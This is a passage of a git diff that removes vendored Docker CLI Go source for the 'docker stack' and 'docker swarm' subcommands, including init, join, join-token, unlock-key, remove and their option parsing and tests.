2, ' ', 0) - - // Ignore flushing errors - defer writer.Flush() - - fmt.Fprintf(writer, listItemFmt, "NAME", "SERVICES") - for _, stack := range stacks { - fmt.Fprintf( - writer, - listItemFmt, - stack.Name, - strconv.Itoa(stack.Services), - ) 
- } -} - -type stack struct { - // Name is the name of the stack - Name string - // Services is the number of the services - Services int -} - -func getStacks( - ctx context.Context, - apiclient client.APIClient, -) ([]*stack, error) { - services, err := apiclient.ServiceList( - ctx, - types.ServiceListOptions{Filters: getAllStacksFilter()}) - if err != nil { - return nil, err - } - m := make(map[string]*stack, 0) - for _, service := range services { - labels := service.Spec.Labels - name, ok := labels[convert.LabelNamespace] - if !ok { - return nil, fmt.Errorf("cannot get label %s for service %s", - convert.LabelNamespace, service.ID) - } - ztack, ok := m[name] - if !ok { - m[name] = &stack{ - Name: name, - Services: 1, - } - } else { - ztack.Services++ - } - } - var stacks []*stack - for _, stack := range m { - stacks = append(stacks, stack) - } - return stacks, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/opts.go b/vendor/github.com/docker/docker/cli/command/stack/opts.go deleted file mode 100644 index 74fe4f5343..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/opts.go +++ /dev/null @@ -1,49 +0,0 @@ -package stack - -import ( - "fmt" - "io" - "os" - - "github.com/docker/docker/cli/command/bundlefile" - "github.com/spf13/pflag" -) - -func addComposefileFlag(opt *string, flags *pflag.FlagSet) { - flags.StringVarP(opt, "compose-file", "c", "", "Path to a Compose file") -} - -func addBundlefileFlag(opt *string, flags *pflag.FlagSet) { - flags.StringVar(opt, "bundle-file", "", "Path to a Distributed Application Bundle file") - flags.SetAnnotation("bundle-file", "experimental", nil) -} - -func addRegistryAuthFlag(opt *bool, flags *pflag.FlagSet) { - flags.BoolVar(opt, "with-registry-auth", false, "Send registry authentication details to Swarm agents") -} - -func loadBundlefile(stderr io.Writer, namespace string, path string) (*bundlefile.Bundlefile, error) { - defaultPath := fmt.Sprintf("%s.dab", namespace) - - if path == "" 
{ - path = defaultPath - } - if _, err := os.Stat(path); err != nil { - return nil, fmt.Errorf( - "Bundle %s not found. Specify the path with --file", - path) - } - - fmt.Fprintf(stderr, "Loading bundle from %s\n", path) - reader, err := os.Open(path) - if err != nil { - return nil, err - } - defer reader.Close() - - bundle, err := bundlefile.LoadFile(reader) - if err != nil { - return nil, fmt.Errorf("Error reading %s: %v\n", path, err) - } - return bundle, err -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/ps.go b/vendor/github.com/docker/docker/cli/command/stack/ps.go deleted file mode 100644 index e4351bfc7c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/ps.go +++ /dev/null @@ -1,61 +0,0 @@ -package stack - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/cli/command/task" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type psOptions struct { - filter opts.FilterOpt - noTrunc bool - namespace string - noResolve bool -} - -func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := psOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ps [OPTIONS] STACK", - Short: "List the tasks in the stack", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.namespace = args[0] - return runPS(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") - flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runPS(dockerCli *command.DockerCli, opts psOptions) error { - namespace := opts.namespace - client := dockerCli.Client() - ctx := context.Background() 
- - filter := getStackFilterFromOpt(opts.namespace, opts.filter) - tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) - if err != nil { - return err - } - - if len(tasks) == 0 { - fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace) - return nil - } - - return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/remove.go b/vendor/github.com/docker/docker/cli/command/stack/remove.go deleted file mode 100644 index 966c1aa6bf..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/remove.go +++ /dev/null @@ -1,112 +0,0 @@ -package stack - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type removeOptions struct { - namespace string -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts removeOptions - - cmd := &cobra.Command{ - Use: "rm STACK", - Aliases: []string{"remove", "down"}, - Short: "Remove the stack", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.namespace = args[0] - return runRemove(dockerCli, opts) - }, - } - return cmd -} - -func runRemove(dockerCli *command.DockerCli, opts removeOptions) error { - namespace := opts.namespace - client := dockerCli.Client() - ctx := context.Background() - - services, err := getServices(ctx, client, namespace) - if err != nil { - return err - } - - networks, err := getStackNetworks(ctx, client, namespace) - if err != nil { - return err - } - - secrets, err := getStackSecrets(ctx, client, namespace) - if err != nil { - return err - } - - if len(services)+len(networks)+len(secrets) == 0 { - fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace) - return nil - } - - hasError := 
removeServices(ctx, dockerCli, services) - hasError = removeSecrets(ctx, dockerCli, secrets) || hasError - hasError = removeNetworks(ctx, dockerCli, networks) || hasError - - if hasError { - return fmt.Errorf("Failed to remove some resources") - } - return nil -} - -func removeServices( - ctx context.Context, - dockerCli *command.DockerCli, - services []swarm.Service, -) bool { - var err error - for _, service := range services { - fmt.Fprintf(dockerCli.Err(), "Removing service %s\n", service.Spec.Name) - if err = dockerCli.Client().ServiceRemove(ctx, service.ID); err != nil { - fmt.Fprintf(dockerCli.Err(), "Failed to remove service %s: %s", service.ID, err) - } - } - return err != nil -} - -func removeNetworks( - ctx context.Context, - dockerCli *command.DockerCli, - networks []types.NetworkResource, -) bool { - var err error - for _, network := range networks { - fmt.Fprintf(dockerCli.Err(), "Removing network %s\n", network.Name) - if err = dockerCli.Client().NetworkRemove(ctx, network.ID); err != nil { - fmt.Fprintf(dockerCli.Err(), "Failed to remove network %s: %s", network.ID, err) - } - } - return err != nil -} - -func removeSecrets( - ctx context.Context, - dockerCli *command.DockerCli, - secrets []swarm.Secret, -) bool { - var err error - for _, secret := range secrets { - fmt.Fprintf(dockerCli.Err(), "Removing secret %s\n", secret.Spec.Name) - if err = dockerCli.Client().SecretRemove(ctx, secret.ID); err != nil { - fmt.Fprintf(dockerCli.Err(), "Failed to remove secret %s: %s", secret.ID, err) - } - } - return err != nil -} diff --git a/vendor/github.com/docker/docker/cli/command/stack/services.go b/vendor/github.com/docker/docker/cli/command/stack/services.go deleted file mode 100644 index a46652df7c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/stack/services.go +++ /dev/null @@ -1,79 +0,0 @@ -package stack - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - 
"github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/service" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type servicesOptions struct { - quiet bool - filter opts.FilterOpt - namespace string -} - -func newServicesCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := servicesOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "services [OPTIONS] STACK", - Short: "List the services in the stack", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.namespace = args[0] - return runServices(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runServices(dockerCli *command.DockerCli, opts servicesOptions) error { - ctx := context.Background() - client := dockerCli.Client() - - filter := getStackFilterFromOpt(opts.namespace, opts.filter) - services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: filter}) - if err != nil { - return err - } - - out := dockerCli.Out() - - // if no services in this stack, print message and exit 0 - if len(services) == 0 { - fmt.Fprintf(out, "Nothing found in stack: %s\n", opts.namespace) - return nil - } - - if opts.quiet { - service.PrintQuiet(out, services) - } else { - taskFilter := filters.NewArgs() - for _, service := range services { - taskFilter.Add("service", service.ID) - } - - tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter}) - if err != nil { - return err - } - nodes, err := client.NodeList(ctx, types.NodeListOptions{}) - if err != nil { - return err - } - service.PrintNotQuiet(out, services, nodes, tasks) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go 
b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go deleted file mode 100644 index 632679c4b6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go +++ /dev/null @@ -1,28 +0,0 @@ -package swarm - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewSwarmCommand returns a cobra command for `swarm` subcommands -func NewSwarmCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "swarm", - Short: "Manage Swarm", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newInitCommand(dockerCli), - newJoinCommand(dockerCli), - newJoinTokenCommand(dockerCli), - newUnlockKeyCommand(dockerCli), - newUpdateCommand(dockerCli), - newLeaveCommand(dockerCli), - newUnlockCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/init.go b/vendor/github.com/docker/docker/cli/command/swarm/init.go deleted file mode 100644 index 2550feeb47..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/init.go +++ /dev/null @@ -1,85 +0,0 @@ -package swarm - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/pkg/errors" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -type initOptions struct { - swarmOptions - listenAddr NodeAddrOption - // Not a NodeAddrOption because it has no default port. 
- advertiseAddr string - forceNewCluster bool -} - -func newInitCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := initOptions{ - listenAddr: NewListenAddrOption(), - } - - cmd := &cobra.Command{ - Use: "init [OPTIONS]", - Short: "Initialize a swarm", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runInit(dockerCli, cmd.Flags(), opts) - }, - } - - flags := cmd.Flags() - flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: [:port])") - flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: [:port])") - flags.BoolVar(&opts.forceNewCluster, "force-new-cluster", false, "Force create a new cluster from current state") - flags.BoolVar(&opts.autolock, flagAutolock, false, "Enable manager autolocking (requiring an unlock key to start a stopped manager)") - addSwarmFlags(flags, &opts.swarmOptions) - return cmd -} - -func runInit(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts initOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - req := swarm.InitRequest{ - ListenAddr: opts.listenAddr.String(), - AdvertiseAddr: opts.advertiseAddr, - ForceNewCluster: opts.forceNewCluster, - Spec: opts.swarmOptions.ToSpec(flags), - AutoLockManagers: opts.swarmOptions.autolock, - } - - nodeID, err := client.SwarmInit(ctx, req) - if err != nil { - if strings.Contains(err.Error(), "could not choose an IP address to advertise") || strings.Contains(err.Error(), "could not find the system's IP address") { - return errors.New(err.Error() + " - specify one with --advertise-addr") - } - return err - } - - fmt.Fprintf(dockerCli.Out(), "Swarm initialized: current node (%s) is now a manager.\n\n", nodeID) - - if err := printJoinCommand(ctx, dockerCli, nodeID, true, false); err != nil { - return err - } - - fmt.Fprint(dockerCli.Out(), "To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.\n\n") - - if req.AutoLockManagers 
{ - unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) - if err != nil { - return errors.Wrap(err, "could not fetch unlock key") - } - printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join.go b/vendor/github.com/docker/docker/cli/command/swarm/join.go deleted file mode 100644 index 004313b4c6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/join.go +++ /dev/null @@ -1,69 +0,0 @@ -package swarm - -import ( - "fmt" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type joinOptions struct { - remote string - listenAddr NodeAddrOption - // Not a NodeAddrOption because it has no default port. - advertiseAddr string - token string -} - -func newJoinCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := joinOptions{ - listenAddr: NewListenAddrOption(), - } - - cmd := &cobra.Command{ - Use: "join [OPTIONS] HOST:PORT", - Short: "Join a swarm as a node and/or manager", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.remote = args[0] - return runJoin(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: [:port])") - flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: [:port])") - flags.StringVar(&opts.token, flagToken, "", "Token for entry into the swarm") - return cmd -} - -func runJoin(dockerCli *command.DockerCli, opts joinOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - req := swarm.JoinRequest{ - JoinToken: opts.token, - ListenAddr: opts.listenAddr.String(), - AdvertiseAddr: opts.advertiseAddr, - RemoteAddrs: []string{opts.remote}, - } - err := client.SwarmJoin(ctx, req) - if err != nil { - return err - } - - info, err := client.Info(ctx) - 
if err != nil { - return err - } - - if info.Swarm.ControlAvailable { - fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a manager.") - } else { - fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a worker.") - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go deleted file mode 100644 index 3a17a8020f..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go +++ /dev/null @@ -1,105 +0,0 @@ -package swarm - -import ( - "errors" - "fmt" - - "github.com/spf13/cobra" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "golang.org/x/net/context" -) - -func newJoinTokenCommand(dockerCli *command.DockerCli) *cobra.Command { - var rotate, quiet bool - - cmd := &cobra.Command{ - Use: "join-token [OPTIONS] (worker|manager)", - Short: "Manage join tokens", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - worker := args[0] == "worker" - manager := args[0] == "manager" - - if !worker && !manager { - return errors.New("unknown role " + args[0]) - } - - client := dockerCli.Client() - ctx := context.Background() - - if rotate { - var flags swarm.UpdateFlags - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - flags.RotateWorkerToken = worker - flags.RotateManagerToken = manager - - err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags) - if err != nil { - return err - } - if !quiet { - fmt.Fprintf(dockerCli.Out(), "Successfully rotated %s join token.\n\n", args[0]) - } - } - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - if quiet { - if worker { - fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Worker) - } else { - fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Manager) - } - } else { - info, err := client.Info(ctx) - if err != nil { - return err - } - 
return printJoinCommand(ctx, dockerCli, info.Swarm.NodeID, worker, manager) - } - return nil - }, - } - - flags := cmd.Flags() - flags.BoolVar(&rotate, flagRotate, false, "Rotate join token") - flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token") - - return cmd -} - -func printJoinCommand(ctx context.Context, dockerCli *command.DockerCli, nodeID string, worker bool, manager bool) error { - client := dockerCli.Client() - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - node, _, err := client.NodeInspectWithRaw(ctx, nodeID) - if err != nil { - return err - } - - if node.ManagerStatus != nil { - if worker { - fmt.Fprintf(dockerCli.Out(), "To add a worker to this swarm, run the following command:\n\n docker swarm join \\\n --token %s \\\n %s\n\n", swarm.JoinTokens.Worker, node.ManagerStatus.Addr) - } - if manager { - fmt.Fprintf(dockerCli.Out(), "To add a manager to this swarm, run the following command:\n\n docker swarm join \\\n --token %s \\\n %s\n\n", swarm.JoinTokens.Manager, node.ManagerStatus.Addr) - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/leave.go b/vendor/github.com/docker/docker/cli/command/swarm/leave.go deleted file mode 100644 index e2cfa0a045..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/leave.go +++ /dev/null @@ -1,44 +0,0 @@ -package swarm - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type leaveOptions struct { - force bool -} - -func newLeaveCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := leaveOptions{} - - cmd := &cobra.Command{ - Use: "leave [OPTIONS]", - Short: "Leave the swarm", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runLeave(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force this node to leave the swarm, 
ignoring warnings") - return cmd -} - -func runLeave(dockerCli *command.DockerCli, opts leaveOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - if err := client.SwarmLeave(ctx, opts.force); err != nil { - return err - } - - fmt.Fprintln(dockerCli.Out(), "Node left the swarm.") - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts.go b/vendor/github.com/docker/docker/cli/command/swarm/opts.go deleted file mode 100644 index 9db46dcf55..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/opts.go +++ /dev/null @@ -1,209 +0,0 @@ -package swarm - -import ( - "encoding/csv" - "errors" - "fmt" - "strings" - "time" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/opts" - "github.com/spf13/pflag" -) - -const ( - defaultListenAddr = "0.0.0.0:2377" - - flagCertExpiry = "cert-expiry" - flagDispatcherHeartbeat = "dispatcher-heartbeat" - flagListenAddr = "listen-addr" - flagAdvertiseAddr = "advertise-addr" - flagQuiet = "quiet" - flagRotate = "rotate" - flagToken = "token" - flagTaskHistoryLimit = "task-history-limit" - flagExternalCA = "external-ca" - flagMaxSnapshots = "max-snapshots" - flagSnapshotInterval = "snapshot-interval" - flagLockKey = "lock-key" - flagAutolock = "autolock" -) - -type swarmOptions struct { - taskHistoryLimit int64 - dispatcherHeartbeat time.Duration - nodeCertExpiry time.Duration - externalCA ExternalCAOption - maxSnapshots uint64 - snapshotInterval uint64 - autolock bool -} - -// NodeAddrOption is a pflag.Value for listening addresses -type NodeAddrOption struct { - addr string -} - -// String prints the representation of this flag -func (a *NodeAddrOption) String() string { - return a.Value() -} - -// Set the value for this flag -func (a *NodeAddrOption) Set(value string) error { - addr, err := opts.ParseTCPAddr(value, a.addr) - if err != nil { - return err - } - a.addr = addr - return nil -} - -// Type returns the type of this flag -func (a 
*NodeAddrOption) Type() string { - return "node-addr" -} - -// Value returns the value of this option as addr:port -func (a *NodeAddrOption) Value() string { - return strings.TrimPrefix(a.addr, "tcp://") -} - -// NewNodeAddrOption returns a new node address option -func NewNodeAddrOption(addr string) NodeAddrOption { - return NodeAddrOption{addr} -} - -// NewListenAddrOption returns a NodeAddrOption with default values -func NewListenAddrOption() NodeAddrOption { - return NewNodeAddrOption(defaultListenAddr) -} - -// ExternalCAOption is a Value type for parsing external CA specifications. -type ExternalCAOption struct { - values []*swarm.ExternalCA -} - -// Set parses an external CA option. -func (m *ExternalCAOption) Set(value string) error { - parsed, err := parseExternalCA(value) - if err != nil { - return err - } - - m.values = append(m.values, parsed) - return nil -} - -// Type returns the type of this option. -func (m *ExternalCAOption) Type() string { - return "external-ca" -} - -// String returns a string repr of this option. -func (m *ExternalCAOption) String() string { - externalCAs := []string{} - for _, externalCA := range m.values { - repr := fmt.Sprintf("%s: %s", externalCA.Protocol, externalCA.URL) - externalCAs = append(externalCAs, repr) - } - return strings.Join(externalCAs, ", ") -} - -// Value returns the external CAs -func (m *ExternalCAOption) Value() []*swarm.ExternalCA { - return m.values -} - -// parseExternalCA parses an external CA specification from the command line, -// such as protocol=cfssl,url=https://example.com. 
-func parseExternalCA(caSpec string) (*swarm.ExternalCA, error) { - csvReader := csv.NewReader(strings.NewReader(caSpec)) - fields, err := csvReader.Read() - if err != nil { - return nil, err - } - - externalCA := swarm.ExternalCA{ - Options: make(map[string]string), - } - - var ( - hasProtocol bool - hasURL bool - ) - - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - - if len(parts) != 2 { - return nil, fmt.Errorf("invalid field '%s' must be a key=value pair", field) - } - - key, value := parts[0], parts[1] - - switch strings.ToLower(key) { - case "protocol": - hasProtocol = true - if strings.ToLower(value) == string(swarm.ExternalCAProtocolCFSSL) { - externalCA.Protocol = swarm.ExternalCAProtocolCFSSL - } else { - return nil, fmt.Errorf("unrecognized external CA protocol %s", value) - } - case "url": - hasURL = true - externalCA.URL = value - default: - externalCA.Options[key] = value - } - } - - if !hasProtocol { - return nil, errors.New("the external-ca option needs a protocol= parameter") - } - if !hasURL { - return nil, errors.New("the external-ca option needs a url= parameter") - } - - return &externalCA, nil -} - -func addSwarmFlags(flags *pflag.FlagSet, opts *swarmOptions) { - flags.Int64Var(&opts.taskHistoryLimit, flagTaskHistoryLimit, 5, "Task history retention limit") - flags.DurationVar(&opts.dispatcherHeartbeat, flagDispatcherHeartbeat, time.Duration(5*time.Second), "Dispatcher heartbeat period (ns|us|ms|s|m|h)") - flags.DurationVar(&opts.nodeCertExpiry, flagCertExpiry, time.Duration(90*24*time.Hour), "Validity period for node certificates (ns|us|ms|s|m|h)") - flags.Var(&opts.externalCA, flagExternalCA, "Specifications of one or more certificate signing endpoints") - flags.Uint64Var(&opts.maxSnapshots, flagMaxSnapshots, 0, "Number of additional Raft snapshots to retain") - flags.Uint64Var(&opts.snapshotInterval, flagSnapshotInterval, 10000, "Number of log entries between Raft snapshots") -} - -func (opts *swarmOptions) 
mergeSwarmSpec(spec *swarm.Spec, flags *pflag.FlagSet) { - if flags.Changed(flagTaskHistoryLimit) { - spec.Orchestration.TaskHistoryRetentionLimit = &opts.taskHistoryLimit - } - if flags.Changed(flagDispatcherHeartbeat) { - spec.Dispatcher.HeartbeatPeriod = opts.dispatcherHeartbeat - } - if flags.Changed(flagCertExpiry) { - spec.CAConfig.NodeCertExpiry = opts.nodeCertExpiry - } - if flags.Changed(flagExternalCA) { - spec.CAConfig.ExternalCAs = opts.externalCA.Value() - } - if flags.Changed(flagMaxSnapshots) { - spec.Raft.KeepOldSnapshots = &opts.maxSnapshots - } - if flags.Changed(flagSnapshotInterval) { - spec.Raft.SnapshotInterval = opts.snapshotInterval - } - if flags.Changed(flagAutolock) { - spec.EncryptionConfig.AutoLockManagers = opts.autolock - } -} - -func (opts *swarmOptions) ToSpec(flags *pflag.FlagSet) swarm.Spec { - var spec swarm.Spec - opts.mergeSwarmSpec(&spec, flags) - return spec -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go deleted file mode 100644 index 568dc87302..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go +++ /dev/null @@ -1,37 +0,0 @@ -package swarm - -import ( - "testing" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestNodeAddrOptionSetHostAndPort(t *testing.T) { - opt := NewNodeAddrOption("old:123") - addr := "newhost:5555" - assert.NilError(t, opt.Set(addr)) - assert.Equal(t, opt.Value(), addr) -} - -func TestNodeAddrOptionSetHostOnly(t *testing.T) { - opt := NewListenAddrOption() - assert.NilError(t, opt.Set("newhost")) - assert.Equal(t, opt.Value(), "newhost:2377") -} - -func TestNodeAddrOptionSetHostOnlyIPv6(t *testing.T) { - opt := NewListenAddrOption() - assert.NilError(t, opt.Set("::1")) - assert.Equal(t, opt.Value(), "[::1]:2377") -} - -func TestNodeAddrOptionSetPortOnly(t *testing.T) { - opt := NewListenAddrOption() - assert.NilError(t, opt.Set(":4545")) - assert.Equal(t, 
opt.Value(), "0.0.0.0:4545") -} - -func TestNodeAddrOptionSetInvalidFormat(t *testing.T) { - opt := NewListenAddrOption() - assert.Error(t, opt.Set("http://localhost:4545"), "Invalid") -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go deleted file mode 100644 index 048fb56e3d..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go +++ /dev/null @@ -1,54 +0,0 @@ -package swarm - -import ( - "bufio" - "fmt" - "io" - "strings" - - "github.com/spf13/cobra" - "golang.org/x/crypto/ssh/terminal" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "golang.org/x/net/context" -) - -func newUnlockCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "unlock", - Short: "Unlock swarm", - Args: cli.ExactArgs(0), - RunE: func(cmd *cobra.Command, args []string) error { - client := dockerCli.Client() - ctx := context.Background() - - key, err := readKey(dockerCli.In(), "Please enter unlock key: ") - if err != nil { - return err - } - req := swarm.UnlockRequest{ - UnlockKey: key, - } - - return client.SwarmUnlock(ctx, req) - }, - } - - return cmd -} - -func readKey(in *command.InStream, prompt string) (string, error) { - if in.IsTerminal() { - fmt.Print(prompt) - dt, err := terminal.ReadPassword(int(in.FD())) - fmt.Println() - return string(dt), err - } - key, err := bufio.NewReader(in).ReadString('\n') - if err == io.EOF { - err = nil - } - return strings.TrimSpace(key), err -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go deleted file mode 100644 index 96450f55b8..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go +++ /dev/null @@ -1,79 +0,0 @@ -package swarm - -import ( - "fmt" - - "github.com/spf13/cobra" - - 
"github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/pkg/errors" - "golang.org/x/net/context" -) - -func newUnlockKeyCommand(dockerCli *command.DockerCli) *cobra.Command { - var rotate, quiet bool - - cmd := &cobra.Command{ - Use: "unlock-key [OPTIONS]", - Short: "Manage the unlock key", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - client := dockerCli.Client() - ctx := context.Background() - - if rotate { - flags := swarm.UpdateFlags{RotateManagerUnlockKey: true} - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - if !swarm.Spec.EncryptionConfig.AutoLockManagers { - return errors.New("cannot rotate because autolock is not turned on") - } - - err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags) - if err != nil { - return err - } - if !quiet { - fmt.Fprintf(dockerCli.Out(), "Successfully rotated manager unlock key.\n\n") - } - } - - unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) - if err != nil { - return errors.Wrap(err, "could not fetch unlock key") - } - - if unlockKeyResp.UnlockKey == "" { - return errors.New("no unlock key is set") - } - - if quiet { - fmt.Fprintln(dockerCli.Out(), unlockKeyResp.UnlockKey) - } else { - printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) - } - return nil - }, - } - - flags := cmd.Flags() - flags.BoolVar(&rotate, flagRotate, false, "Rotate unlock key") - flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token") - - return cmd -} - -func printUnlockCommand(ctx context.Context, dockerCli *command.DockerCli, unlockKey string) { - if len(unlockKey) == 0 { - return - } - - fmt.Fprintf(dockerCli.Out(), "To unlock a swarm manager after it restarts, run the `docker swarm unlock`\ncommand and provide the following key:\n\n %s\n\nPlease remember to store this key in a password manager, since without it you\nwill not be able to restart the manager.\n", unlockKey) - 
return -} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/update.go b/vendor/github.com/docker/docker/cli/command/swarm/update.go deleted file mode 100644 index dbbd268725..0000000000 --- a/vendor/github.com/docker/docker/cli/command/swarm/update.go +++ /dev/null @@ -1,72 +0,0 @@ -package swarm - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/pkg/errors" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := swarmOptions{} - - cmd := &cobra.Command{ - Use: "update [OPTIONS]", - Short: "Update the swarm", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runUpdate(dockerCli, cmd.Flags(), opts) - }, - PreRunE: func(cmd *cobra.Command, args []string) error { - if cmd.Flags().NFlag() == 0 { - return pflag.ErrHelp - } - return nil - }, - } - - cmd.Flags().BoolVar(&opts.autolock, flagAutolock, false, "Change manager autolocking setting (true|false)") - addSwarmFlags(cmd.Flags(), &opts) 